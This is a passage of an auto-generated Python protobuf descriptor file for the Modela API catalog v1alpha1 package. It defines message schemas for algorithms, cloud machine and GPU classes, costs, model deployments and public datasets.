\x03(\x0b\x32G.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.FloatParameter\x12l\n\x15\x63\x61tegoricalParameters\x18\x08 \x03(\x0b\x32M.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CategoricalParameter\"I\n\x14\x43\x61tegoricalParameter\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x14\n\x0c\x64\x65\x66\x61ultValue\x18\x02 \x01(\t\x12\r\n\x05\x65nums\x18\x03 \x03(\t\"\xf3\x01\n\x05\x43loud\x12\x42\n\x08metadata\x18\x01 \x01(\x0b\x32\x30.k8s.io.apimachinery.pkg.apis.meta.v1.ObjectMeta\x12P\n\x04spec\x18\x02 \x01(\x0b\x32\x42.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudSpec\x12T\n\x06status\x18\x03 
\x01(\x0b\x32\x44.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudStatus\"\x9c\x01\n\tCloudList\x12@\n\x08metadata\x18\x01 \x01(\x0b\x32..k8s.io.apimachinery.pkg.apis.meta.v1.ListMeta\x12M\n\x05items\x18\x02 \x03(\x0b\x32>.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Cloud\"\xec\x02\n\tCloudSpec\x12\x19\n\x11\x64\x65\x66\x61ultRegionName\x18\x01 \x01(\t\x12\x1f\n\x17\x64\x65\x66\x61ultMachineClassName\x18\x02 \x01(\t\x12\x1b\n\x13\x64\x65\x66\x61ultGpuClassName\x18\x03 \x01(\t\x12]\n\x0emachineClasses\x18\x04 \x03(\x0b\x32\x45.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClass\x12U\n\ngpuClasses\x18\x05 \x03(\x0b\x32\x41.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClass\x12P\n\x07regions\x18\x06 \x03(\x0b\x32?.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Region\"\xc7\x01\n\x0b\x43loudStatus\x12_\n\x0cmachineCosts\x18\x01 \x03(\x0b\x32I.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClassCost\x12W\n\x08gpuCosts\x18\x02 \x03(\x0b\x32\x45.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClassCost\"A\n\x0c\x43ompilerSpec\x12\x0e\n\x06\x65nable\x18\x01 \x01(\x08\x12\x10\n\x08\x63ompiler\x18\x02 \x01(\t\x12\x0f\n\x07targets\x18\x03 \x03(\t\"l\n\x0f\x43onfusionMatrix\x12Y\n\x04rows\x18\x01 \x03(\x0b\x32K.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ConfusionMatrixRow\"F\n\x12\x43onfusionMatrixRow\x12\t\n\x01t\x18\x01 \x01(\t\x12\t\n\x01p\x18\x02 \x01(\t\x12\r\n\x05\x63ount\x18\x03 \x01(\x05\x12\x0b\n\x03pct\x18\x04 \x01(\x01\"\"\n\nCurvePoint\x12\t\n\x01x\x18\x01 \x01(\x01\x12\t\n\x01y\x18\x02 \x01(\x01\"(\n\nDataCenter\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0c\n\x04\x63ode\x18\x02 \x01(\t\"[\n\x0e\x46loatParameter\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0b\n\x03min\x18\x03 \x01(\x01\x12\x0b\n\x03max\x18\x04 \x01(\x01\x12\x14\n\x0c\x64\x65\x66\x61ultValue\x18\x05 \x01(\x01\x12\x0b\n\x03log\x18\x06 \x01(\x08\"t\n\x0cGithubEvents\x12\x19\n\x11gitConnectionName\x18\x01 
\x01(\t\x12\x12\n\nrepository\x18\x02 \x01(\t\x12\x0e\n\x06\x62ranch\x18\x03 \x01(\t\x12\x15\n\rblobNameRegex\x18\x04 \x01(\t\x12\x0e\n\x06\x65vents\x18\x05 \x03(\t\"z\n\x08GpuClass\x12\x0c\n\x04\x63ode\x18\x01 \x01(\t\x12\x12\n\nregionName\x18\x02 \x01(\t\x12\x0c\n\x04vcpu\x18\x03 \x01(\x05\x12>\n\x06gpumem\x18\x04 \x01(\x0b\x32..k8s.io.apimachinery.pkg.api.resource.Quantity\"\xb5\x01\n\x0cGpuClassCost\x12\x0c\n\x04\x63ode\x18\x01 \x01(\t\x12\x0e\n\x06region\x18\x02 \x01(\t\x12\x45\n\rcostPerMinute\x18\x03 \x01(\x0b\x32..k8s.io.apimachinery.pkg.api.resource.Quantity\x12@\n\x08\x63ostSpot\x18\x04 \x01(\x0b\x32..k8s.io.apimachinery.pkg.api.resource.Quantity\"Z\n\x0cIntParameter\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0c\n\x04type\x18\x02 \x01(\t\x12\x0b\n\x03min\x18\x03 \x01(\x05\x12\x0b\n\x03max\x18\x04 \x01(\x05\x12\x14\n\x0c\x64\x65\x66\x61ultValue\x18\x06 \x01(\x05\"*\n\x03Lib\x12\x12\n\nframeworks\x18\x01 \x01(\t\x12\x0f\n\x07version\x18\x02 \x01(\t\")\n\x04Logs\x12\x12\n\nbucketName\x18\x01 \x01(\t\x12\r\n\x05paths\x18\x02 \x03(\t\"\xa9\x01\n\x0bMLFramework\x12\x42\n\x08metadata\x18\x01 \x01(\x0b\x32\x30.k8s.io.apimachinery.pkg.apis.meta.v1.ObjectMeta\x12V\n\x04spec\x18\x02 \x01(\x0b\x32H.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFrameworkSpec\"\xa8\x01\n\x0fMLFrameworkList\x12@\n\x08metadata\x18\x01 \x01(\x0b\x32..k8s.io.apimachinery.pkg.apis.meta.v1.ListMeta\x12S\n\x05items\x18\x02 \x03(\x0b\x32\x44.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFramework\"R\n\x0fMLFrameworkSpec\x12\x0b\n\x03url\x18\x01 \x01(\t\x12\x13\n\x0b\x64\x65scription\x18\x02 \x01(\t\x12\x0f\n\x07version\x18\x03 \x01(\t\x12\x0c\n\x04lang\x18\x04 \x01(\t\"\x8c\x01\n\x0cMachineClass\x12\x0c\n\x04\x63ode\x18\x01 \x01(\t\x12\x12\n\nregionName\x18\x02 \x01(\t\x12;\n\x03mem\x18\x03 \x01(\x0b\x32..k8s.io.apimachinery.pkg.api.resource.Quantity\x12\x0c\n\x04vcpu\x18\x04 \x01(\x05\x12\x0f\n\x07storage\x18\x05 
\x01(\t\"\xb9\x01\n\x10MachineClassCost\x12\x0c\n\x04\x63ode\x18\x01 \x01(\t\x12\x0e\n\x06region\x18\x02 \x01(\t\x12\x45\n\rcostPerMinute\x18\x03 \x01(\x0b\x32..k8s.io.apimachinery.pkg.api.resource.Quantity\x12@\n\x08\x63ostSpot\x18\x04 \x01(\x0b\x32..k8s.io.apimachinery.pkg.api.resource.Quantity\",\n\x0bMeasurement\x12\x0e\n\x06metric\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\x01\"\xe9\x01\n\x13ModelDeploymentSpec\x12\x11\n\tmodelName\x18\x01 \x01(\t\x12\x14\n\x0cmodelVersion\x18\x02 \x01(\t\x12\x12\n\nmaxTraffic\x18\x03 \x01(\x05\x12\x0f\n\x07traffic\x18\x04 \x01(\x05\x12\x0e\n\x06\x63\x61nary\x18\x05 \x01(\x08\x12\x0e\n\x06shadow\x18\x06 \x01(\x08\x12\x10\n\x08released\x18\x07 \x01(\x08\x12\x10\n\x08\x64\x65ployed\x18\x08 \x01(\x08\x12\x10\n\x08mountTar\x18\t \x01(\x08\x12\x17\n\x0ftrafficSelector\x18\n \x01(\t\x12\x15\n\rcanaryMetrics\x18\x0b \x03(\t\"\xcf\x04\n\x15ModelDeploymentStatus\x12\x11\n\timageName\x18\x01 \x01(\t\x12:\n\rdeploymentRef\x18\x02 \x01(\x0b\x32#.k8s.io.api.core.v1.ObjectReference\x12\x37\n\nserviceRef\x18\x03 \x01(\x0b\x32#.k8s.io.api.core.v1.ObjectReference\x12\x0f\n\x07hpaName\x18\x04 \x01(\t\x12\x11\n\tcurrent95\x18\x05 \x01(\x01\x12\x11\n\tcurrent99\x18\x06 \x01(\x01\x12\x46\n\x12lastPredictionTime\x18\x07 \x01(\x0b\x32*.k8s.io.apimachinery.pkg.apis.meta.v1.Time\x12\x1a\n\x12\x64\x61ilyPredictionAvg\x18\x08 \x01(\x05\x12\x13\n\x0blastFailure\x18\t \x01(\t\x12\r\n\x05phase\x18\n \x01(\t\x12>\n\ndeployedAt\x18\x0b \x01(\x0b\x32*.k8s.io.apimachinery.pkg.apis.meta.v1.Time\x12>\n\nreleasedAt\x18\x0c \x01(\x0b\x32*.k8s.io.apimachinery.pkg.apis.meta.v1.Time\x12\x1b\n\x13trainingDatasetName\x18\r \x01(\t\x12\x12\n\napprovedBy\x18\x0e \x01(\t\x12>\n\napprovedAt\x18\x0f \x01(\x0b\x32*.k8s.io.apimachinery.pkg.apis.meta.v1.Time\"\x8e\x02\n\x10NotificationSpec\x12\x0f\n\x07onError\x18\x01 \x01(\x08\x12\x10\n\x08\x65rrorTTL\x18\x02 \x01(\x05\x12\x11\n\tonSuccess\x18\x03 \x01(\x08\x12\x12\n\nsuccessTTL\x18\x04 
\x01(\x05\x12\x14\n\x0cnotifierName\x18\x05 \x01(\t\x12i\n\x08selector\x18\x06 \x03(\x0b\x32W.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.NotificationSpec.SelectorEntry\x1a/\n\rSelectorEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\"^\n\x07PRCurve\x12S\n\x06values\x18\x01 \x03(\x0b\x32\x43.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CurvePoint\"\xb1\x01\n\x0fPretrainedModel\x12\x42\n\x08metadata\x18\x01 \x01(\x0b\x32\x30.k8s.io.apimachinery.pkg.apis.meta.v1.ObjectMeta\x12Z\n\x04spec\x18\x02 \x01(\x0b\x32L.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PretrainedModelSpec\"\xb0\x01\n\x13PretrainedModelList\x12@\n\x08metadata\x18\x01 \x01(\x0b\x32..k8s.io.apimachinery.pkg.apis.meta.v1.ListMeta\x12W\n\x05items\x18\x02 \x03(\x0b\x32H.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PretrainedModel\"$\n\x13PretrainedModelSpec\x12\r\n\x05image\x18\x01 \x01(\t\"\xad\x01\n\rPublicDataset\x12\x42\n\x08metadata\x18\x01 \x01(\x0b\x32\x30.k8s.io.apimachinery.pkg.apis.meta.v1.ObjectMeta\x12X\n\x04spec\x18\x02 \x01(\x0b\x32J.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec\"\xac\x01\n\x11PublicDatasetList\x12@\n\x08metadata\x18\x01 \x01(\x0b\x32..k8s.io.apimachinery.pkg.apis.meta.v1.ListMeta\x12U\n\x05items\x18\x02 \x03(\x0b\x32\x46.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDataset\"\xb6\x02\n\x11PublicDatasetSpec\x12\x0b\n\x03url\x18\x01 \x01(\t\x12\x13\n\x0b\x64\x65scription\x18\x02 \x01(\t\x12\x0c\n\x04task\x18\x03 \x01(\t\x12\x10\n\x08openmlID\x18\x04 \x01(\t\x12\x0f\n\x07\x64\x61taUrl\x18\x05 \x01(\t\x12\x10\n\x08\x63itation\x18\x06 \x01(\t\x12\x0c\n\x04rows\x18\x07 \x01(\x05\x12\x0f\n\x07\x63olumns\x18\x08 \x01(\x05\x12\x10\n\x08\x66ileSize\x18\t \x01(\x05\x12\x14\n\x0ctargetColumn\x18\n \x01(\t\x12\x10\n\x08industry\x18\x0b \x01(\t\x12\x12\n\nimbalanced\x18\x0c \x01(\x08\x12\x14\n\x0c\x64\x61tasourceCR\x18\r \x01(\t\x12\x11\n\tdatasetCR\x18\x0e 
\x01(\t\x12\x0f\n\x07studyCR\x18\x0f \x01(\t\x12\x15\n\rdataProductCR\x18\x10 \x01(\t\"\xb6\x01\n\x06Region\x12\x0c\n\x04\x63ode\x18\x01 \x01(\t\x12\x1d\n\x15\x64\x65\x66\x61ultDatacenterName\x18\x02 \x01(\t\x12\x10\n\x08location\x18\x03 \x01(\t\x12\x13\n\x0b\x62illingCode\x18\x04 \x01(\t\x12X\n\x0b\x64\x61tacenters\x18\x05 \x03(\x0b\x32\x43.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.DataCenter\"y\n\x0cResourceSpec\x12\x19\n\x11workloadClassName\x18\x01 \x01(\t\x12\x0e\n\x06\x65nable\x18\x02 \x01(\x08\x12>\n\x0crequirements\x18\x03 \x01(\x0b\x32(.k8s.io.api.core.v1.ResourceRequirements\"b\n\x0bRocAucCurve\x12S\n\x06values\x18\x01 \x03(\x0b\x32\x43.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CurvePoint\"\xbb\x01\n\x0bRunSchedule\x12\x0f\n\x07\x65nabled\x18\x01 \x01(\x08\x12=\n\tstartTime\x18\x02 \x01(\x0b\x32*.k8s.io.apimachinery.pkg.apis.meta.v1.Time\x12@\n\x07\x65ndTime\x18\x03 \x01(\x0b\x32/.k8s.io.apimachinery.pkg.apis.meta.v1.Timestamp\x12\x0c\n\x04\x63ron\x18\x04 \x01(\t\x12\x0c\n\x04type\x18\x05 \x01(\t\"1\n\x0bStakeHolder\x12\x13\n\x0b\x61\x63\x63ountName\x18\x01 \x01(\t\x12\r\n\x05roles\x18\x02 \x03(\t\"\xad\x01\n\rUserRoleClass\x12\x42\n\x08metadata\x18\x01 \x01(\x0b\x32\x30.k8s.io.apimachinery.pkg.apis.meta.v1.ObjectMeta\x12X\n\x04spec\x18\x02 \x01(\x0b\x32J.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.UserRoleClassSpec\"\xac\x01\n\x11UserRoleClassList\x12@\n\x08metadata\x18\x01 \x01(\x0b\x32..k8s.io.apimachinery.pkg.apis.meta.v1.ListMeta\x12U\n\x05items\x18\x02 \x03(\x0b\x32\x46.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.UserRoleClass\"B\n\x11UserRoleClassSpec\x12-\n\x05rules\x18\x01 \x03(\x0b\x32\x1e.k8s.io.api.rbac.v1.PolicyRule\"#\n\x06VizUri\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0b\n\x03uri\x18\x02 \x01(\t\"\xad\x01\n\rWorkloadClass\x12\x42\n\x08metadata\x18\x01 \x01(\x0b\x32\x30.k8s.io.apimachinery.pkg.apis.meta.v1.ObjectMeta\x12X\n\x04spec\x18\x02 
\x01(\x0b\x32J.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClassSpec\"\xac\x01\n\x11WorkloadClassList\x12@\n\x08metadata\x18\x01 \x01(\x0b\x32..k8s.io.apimachinery.pkg.apis.meta.v1.ListMeta\x12U\n\x05items\x18\x02 \x03(\x0b\x32\x46.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClass\"\xf4\x01\n\x11WorkloadClassSpec\x12`\n\x11resourcesTemplate\x18\x01 \x01(\x0b\x32\x45.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ResourceSpec\x12\x12\n\nframeworks\x18\x03 \x03(\t\x12J\n\x04libs\x18\x04 \x03(\x0b\x32<.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Lib\x12\n\n\x02os\x18\x05 \x01(\t\x12\x11\n\tosVersion\x18\x06 \x01(\tB9Z7github.com/metaprov/modelaapi/pkg/apis/catalog/v1alpha1'
,
dependencies=[k8s_dot_io_dot_api_dot_core_dot_v1_dot_generated__pb2.DESCRIPTOR,k8s_dot_io_dot_api_dot_rbac_dot_v1_dot_generated__pb2.DESCRIPTOR,k8s_dot_io_dot_apimachinery_dot_pkg_dot_api_dot_resource_dot_generated__pb2.DESCRIPTOR,k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2.DESCRIPTOR,k8s_dot_io_dot_apimachinery_dot_pkg_dot_runtime_dot_generated__pb2.DESCRIPTOR,k8s_dot_io_dot_apimachinery_dot_pkg_dot_runtime_dot_schema_dot_generated__pb2.DESCRIPTOR,])
# Generated Descriptor for catalog.v1alpha1.Algorithm (protoc output; do not hand-edit).
_ALGORITHM = _descriptor.Descriptor(
  name='Algorithm',
  full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Algorithm',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Algorithm.metadata', index=0,
      number=1, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='spec', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Algorithm.spec', index=1,
      number=2, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=418,
  serialized_end=583,
)
# Generated Descriptor for catalog.v1alpha1.AlgorithmList (protoc output; do not hand-edit).
_ALGORITHMLIST = _descriptor.Descriptor(
  name='AlgorithmList',
  full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmList',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmList.metadata', index=0,
      number=1, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='items', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmList.items', index=1,
      number=2, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=586,
  serialized_end=750,
)
# Generated Descriptor for catalog.v1alpha1.AlgorithmSpec (protoc output; do not hand-edit).
_ALGORITHMSPEC = _descriptor.Descriptor(
  name='AlgorithmSpec',
  full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmSpec',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='frameworkName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmSpec.frameworkName', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='description', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmSpec.description', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='url', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmSpec.url', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='task', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmSpec.task', index=3,
      number=4, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='sparse', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmSpec.sparse', index=4,
      number=5, type=8, cpp_type=7, label=1,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='integerParameters', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmSpec.integerParameters', index=5,
      number=6, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='floatParameters', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmSpec.floatParameters', index=6,
      number=7, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='categoricalParameters', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmSpec.categoricalParameters', index=7,
      number=8, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=753,
  serialized_end=1161,
)
# Generated Descriptor for catalog.v1alpha1.CategoricalParameter (protoc output; do not hand-edit).
_CATEGORICALPARAMETER = _descriptor.Descriptor(
  name='CategoricalParameter',
  full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CategoricalParameter',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='name', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CategoricalParameter.name', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='defaultValue', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CategoricalParameter.defaultValue', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='enums', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CategoricalParameter.enums', index=2,
      number=3, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=1163,
  serialized_end=1236,
)
# Generated Descriptor for catalog.v1alpha1.Cloud (protoc output; do not hand-edit).
_CLOUD = _descriptor.Descriptor(
  name='Cloud',
  full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Cloud',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Cloud.metadata', index=0,
      number=1, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='spec', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Cloud.spec', index=1,
      number=2, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='status', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Cloud.status', index=2,
      number=3, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=1239,
  serialized_end=1482,
)
_CLOUDLIST = _descriptor.Descriptor(
name='CloudList',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudList',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudList.metadata', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='items', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudList.items', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=1485,
serialized_end=1641,
)
_CLOUDSPEC = _descriptor.Descriptor(
name='CloudSpec',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='defaultRegionName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudSpec.defaultRegionName', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='defaultMachineClassName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudSpec.defaultMachineClassName', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='defaultGpuClassName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudSpec.defaultGpuClassName', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='machineClasses', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudSpec.machineClasses', index=3,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='gpuClasses', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudSpec.gpuClasses', index=4,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
